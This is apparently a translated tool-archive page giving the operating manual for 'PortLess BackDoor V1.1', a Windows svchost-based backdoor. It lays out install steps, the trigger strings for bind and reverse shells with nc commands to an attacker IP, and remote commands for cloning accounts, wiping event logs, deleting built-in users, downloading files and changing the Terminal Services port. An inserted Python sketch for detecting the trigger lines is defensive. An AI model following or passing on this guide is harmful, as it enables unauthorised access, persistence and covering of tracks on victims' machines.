PortLessNew

Submitted: 2003-09-24
Submitted by: W7c
Tool category: Backdoor program
Platform: Windows
Tool size: 26,008 bytes
File MD5: 560a2e30c3b7fa4d4a2d4a7ae752b6d7
Tool origin: Wineggdrop hotmail

PortLess BackDoor V1.1

A backdoor program that is started through svchost.exe, normally does not open a port, and supports reverse connection (it is the same type of backdoor as Xiaorong's BITS).
First, heartfelt thanks to bingle: without the svchostdll code he made public, this backdoor could not exist.
At present, three parts of the code in the backdoor are bingle's code, so the banner can only display the phrase "PortLess BackDoor".
Besides the characteristics above, a fair number of functions have been added to this backdoor. The added functions are:
1. Check for cloned accounts
2. Clear logs
3. Clone an account
4. Delete system accounts (the built-in users Guest and Administrator can also be deleted)
5. Enumerate system accounts
6. HTTP download
7. Install Terminal Services
8. List all IP addresses of the system
9. Log off the system
10. Power off the system
11. Reboot
12. Shut down the system
13. View system information
14. View or change the Terminal Services port


How to use:
1. Upload portlessinst.exe and svchostdll.dll (do not rename them) to the system directory (the %winnt%\system32 directory)
2. Portlessinst.exe -install ActiveString Password performs the installation
Here ActiveString is the confirmation string that is entered after connecting to a port the system already has open
Here Password is the password that must be entered when connecting to the port the backdoor opens
3. net start iprip (starts the backdoor service)

Operating instructions:
The confirmation string is entered after connecting to any open port on the compromised machine. Its format is ActiveString|IP:Port.
For a reverse connection, ActiveString, IP and Port must all be entered. If you only want the backdoor to bind a port locally, the IP is not needed.
Pay attention to the two separators | and : (| goes in front of the IP, : goes in front of the Port). If you get them wrong, the program cannot parse the string.
ActiveString, IP and Port must not contain any spaces. If you have used the command line of Portless V1.0, this will already be familiar.
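
A defender-side triage sketch for the trigger format described above, added here and not part of the original tool text: it flags the first line a client sends to a service port when that line fits the ActiveString|IP:Port or ActiveString:Port shape. The ActiveString is chosen at install time, so the check matches the shape rather than a fixed value; it assumes the ActiveString itself contains no | or : (the text does not say), and the capture records are constructed, reusing the values from the page's own examples.

```python
import ipaddress
import re

# Shape taken from the text: no spaces, '|' before the IP, ':' before the port,
# ActiveString at most 64 characters. Excluding '|' and ':' from the
# ActiveString is an assumption of this sketch.
TRIGGER = re.compile(
    r"^(?P<s>[^\s|:]{1,64})(?:\|(?P<ip>[^\s|:]+))?:(?P<port>\d{1,5})$")

def parse_trigger(line: bytes):
    """Return (mode, ip, port) if the line fits the trigger shape, else None."""
    try:
        text = line.decode("ascii").rstrip("\r\n")
    except UnicodeDecodeError:
        return None
    m = TRIGGER.match(text)
    if not m:
        return None
    port = int(m["port"])
    if not 1 <= port <= 65535:
        return None
    if m["ip"] is None:
        return ("bind", None, port)          # ActiveString:Port
    try:
        ip = ipaddress.IPv4Address(m["ip"])  # ActiveString|IP:Port
    except ValueError:
        return None
    return ("reverse", str(ip), port)

def triage(first_payloads):
    """first_payloads: (client_ip, server_port, first bytes sent by the client)."""
    hits = []
    for src, dport, payload in first_payloads:
        parsed = parse_trigger(payload.split(b"\n", 1)[0])
        if parsed:
            hits.append((src, dport) + parsed)
    return hits

# Constructed capture records; client addresses are documentation ranges.
SAMPLES = [
    ("198.51.100.7", 80, b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
    ("198.51.100.9", 80, b"wineggdrop:1982\r\n"),
    ("198.51.100.9", 80, b"wineggdrop|13.13.13.13:12345\r\n"),
    ("198.51.100.9", 80, b"wineggdrop|13.13.13.13 :12345\r\n"),  # space: not valid
    ("203.0.113.5", 25, b"EHLO mail.example.org\r\n"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLES):
        print(hit)
```

A hit is a lead for review, not proof: a short line such as host:port sent as the first bytes of a session also fits the shape, so correlate hits with a new listener or an outbound connection from the server to the parsed address and port.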


Usage example:
1. Suppose I have already uploaded portlessinst.exe and svchostdll.dll to the system whose IP is 12.12.12.12, and this system has port 80 open
2. Run PortLessinst.exe -install wineggdrop test to install (a message shows whether the installation succeeded)
3. net start iprip (the backdoor is now started)

Example 1: Forward connection
1. nc 12.12.12.12 80
2. Once connected, enter wineggdrop:1982
3. nc 12.12.12.12 1982; when the "Enter Password:" banner appears, enter the password test and you are logged in

Example 2: Reverse connection (suppose my IP is 13.13.13.13, and this is my public IP)
1. On your own system, run nc -l -p 12345
2. nc 12.12.12.12 80
3. Once connected, enter wineggdrop|13.13.13.13:12345
4. Then, in the cmd window where nc -l -p 12345 is running, you can see that you are logged in

After logging in you of course obtain a cmd shell. If you have used winshell, wollf or wineggdropshell, this style of backdoor will not be unfamiliar.
After logging in, entering the help command shows the many commands available.
The functions of these commands are described below.

Command reference:
1. CheckClone  Function: checks for cloned accounts
Example: CheckClone

2. CleanEvent  Function: deletes the system logs
Example: CleanEvent

3. Clone  Function: clones an account
Usage: Clone account account-to-clone password
Example: Clone Admin Guest test
The example above clones Guest to the user Admin, and the Guest password is changed to test

4. DelUser  Function: deletes a user (this function can delete built-in users, so do not use it casually)
Usage: DelUser user
Example: Deluser Test
The example above deletes the user test

5. Exit  Function: exits the backdoor
Example: Exit

6. http://ip/filename save-as-filename  Function: downloads a program
Example: http://11.11.11.11/a.exe a.exe
Example: http://www.mysite.com/a.exe a.exe
Example: http://www.mysite.com:81/a.exe a.exe

7. Installterm port  Function: installs Terminal Services on a Win 2k server edition system that does not have Terminal Services installed; it takes effect only after the system is rebooted
Usage: Installterm 3345 (after the reboot, Terminal Services will open port 3345; before using this command, first check whether the terminal port you want to define is already used by another program)

8. ListIP  Function: displays all IP addresses of the system
Example: ListIP

9. Logoff  Function: logs off the system
Example: Logoff

10. PowerOff  Function: powers off the system
Example: PowerOff

11. Reboot  Function: reboots the system
Example: Reboot

12. ShutDown  Function: shuts down the system
Example: ShutDown

13. Shell  Function: obtains a cmd shell
Example: Shell
To quit after obtaining the shell, enter exit, which exits from the backdoor

14. Sysinfo  Function: views the system information (quite detailed)
Example: Sysinfo

15. TerminalPort  Function: views the Terminal Services port
Example: TerminalPort

16. TerminalPort new port  Function: resets the Terminal Services port
Example: TerminalPort new port
Note: the new port must be a valid port, otherwise the program returns an error.


How to remove this backdoor:
1. net stop iprip (you may have to wait a while for everything to be released; if the service is not stopped forcibly, svclog.log will contain a Quit message)
2. sc delete iprip or portlessinst -uninstall. Using the portlessinst -uninstall command is recommended, because removing the backdoor with this command also deletes the ActiveString and password stored in the registry

How to change ActiveString and Password:
1. Portlessinst -set new-ActiveString new-password
2. The change takes effect only after the backdoor service is restarted or the system is rebooted

Other notes:
1. The backdoor can only be used on Win 2k/XP/2003
2. For a reverse connection, the system that accepts the reverse connection must have a public IP
3. When the backdoor starts it creates the file svclog.log, which records the backdoor's error messages and startup information. On startup the backdoor deletes the old svclog.log. If you cannot use this backdoor, look at the information in svclog.log; it may show where things went wrong
4. There has not been much time for testing, so it would not be surprising if there are bugs
5. The maximum length of both ActiveString and Password is 64 characters